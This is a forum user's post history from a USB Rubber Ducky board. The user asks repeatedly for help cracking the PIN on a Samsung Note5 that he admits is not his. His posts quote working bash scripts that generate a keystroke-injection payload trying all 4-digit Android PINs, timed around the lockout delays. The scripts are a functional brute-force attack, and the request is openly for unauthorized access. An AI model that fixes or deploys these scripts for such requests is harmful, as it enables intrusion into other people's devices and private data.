Jump to content

TTT101907

Active Members
 View Profile  See their activity

  • Posts

    15

  • Joined

  • Last visited

 Content Type 

Posts posted by TTT101907

    Samsung note5 hacking the pin password

    in Hacks & Mods

    Posted · Edited by TTT101907

    I've tried every code and haven't had any luck hacking into this note5 phone.  Anyone have any suggestions.  No I don't want to data reset the phone.. its not mine..lol... Anyone have any in sight... I only have the duck encoder to create the bin file... need in this phone.... 

    [Payload] Android Brute Force 4-digit pin

    in Classic USB Rubber Ducky

    Posted

    On ‎12‎/‎6‎/‎2012 at 5:31 PM, Darren Kitchen said:

    I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

    20121205_125338.jpg

    I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

    With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

    Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

      

    
echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

     

    So how do I use this code on your duck tool kit.com site?

    DuckToolkit NG

    in Classic USB Rubber Ducky

    Posted

    On ‎11‎/‎20‎/‎2014 at 9:28 AM, 411Hall said:

    Hi mate, yeah no worries. Send me the .txt, .bin and .ps1 file and i will have a look. It might also be worth launching the PowerShell.exe on your Windows box, navigating to the .ps1 file and attempting to run it from command line. That will show you if there any errors when it attempts to run.

    I will be away for the weekend btw so wont be able to look until Monday.

    Cheers,

    411.

    Hello 411,

    I'm new at this trying to crack a phone password with this and I'm on the duck tool kit.  But what am I doing wrong. It says does not recognize echo....help..:) thank you for any assistance

     

    echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/
    WAIT/g' | gsed '0~1 s/$/
    DELAY 1000
    ENTER
    ENTER/g' | gsed '0~5 s/WAIT/DELAY 5000
    ENTER
    DELAY 5000
    ENTER
    DELAY 5000
    ENTER
    DELAY 5000
    ENTER/g' >> android_brute-force_0000-9999.txt

    echo DELAY 5000 > android_brute-force_0000-9999.txt; e

    DuckToolkit NG

    in Classic USB Rubber Ducky

    Posted

    So I'm on ducktoolkit.com.  What am I doing wrong that this doesn't work. Thank you for the help

     

    echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/
    WAIT/g' | gsed '0~1 s/$/
    DELAY 1000
    ENTER
    ENTER/g' | gsed '0~5 s/WAIT/DELAY 5000
    ENTER
    DELAY 5000
    ENTER
    DELAY 5000
    ENTER
    DELAY 5000
    ENTER/g' >> android_brute-force_0000-9999.txt

    echo DELAY 5000 > android_brute-force_0000-9999.txt; e

    [Payload] Android Brute Force 4-digit pin

    in Classic USB Rubber Ducky

    Posted

    On ‎12‎/‎6‎/‎2012 at 7:38 PM, Darren Kitchen said:

    No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer.

    For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.

     

    On ‎12‎/‎6‎/‎2012 at 5:31 PM, Darren Kitchen said:

    I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

    20121205_125338.jpg

    I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

    With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

    Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

      

    
echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

     

    Im in duck tool kit.com and trying to use this script but it doesn't work.  What am I doing wrong?

    [Payload] Android Brute Force 4-digit pin

    in Classic USB Rubber Ducky

    Posted

    On ‎12‎/‎12‎/‎2012 at 5:36 PM, keb0x80 said:

    I created a script to generate pretty much the same output using only bash loops/conditions

      

    
#!/bin/bash
count=0
echo "DELAY 5000"
for pin in {0000..9999}
do
  count=$((count+1))
  echo "STRING $pin"
  # After every other pin, do this
  if [ $((count % 2)) -eq 0 ]; then
    echo "DELAY 1000"
    echo "ENTER"
    echo "ENTER"
  fi
  # After 5 pins, do this
  if [ $((count % 5)) -eq 0 ]; then
    for (( delay=0 ; $((delay < 4)) ; delay=$((delay+1)) ))
    do
	  echo "DELAY 5000"
	  echo "ENTER"
    done
  fi
done
[/CODE]

     

    I'm on the duck tool kit.com and when I put this is the encoder it rejects it as "does not recognize  !in bash.  What am I doing wrong?

×
×
  • Create New...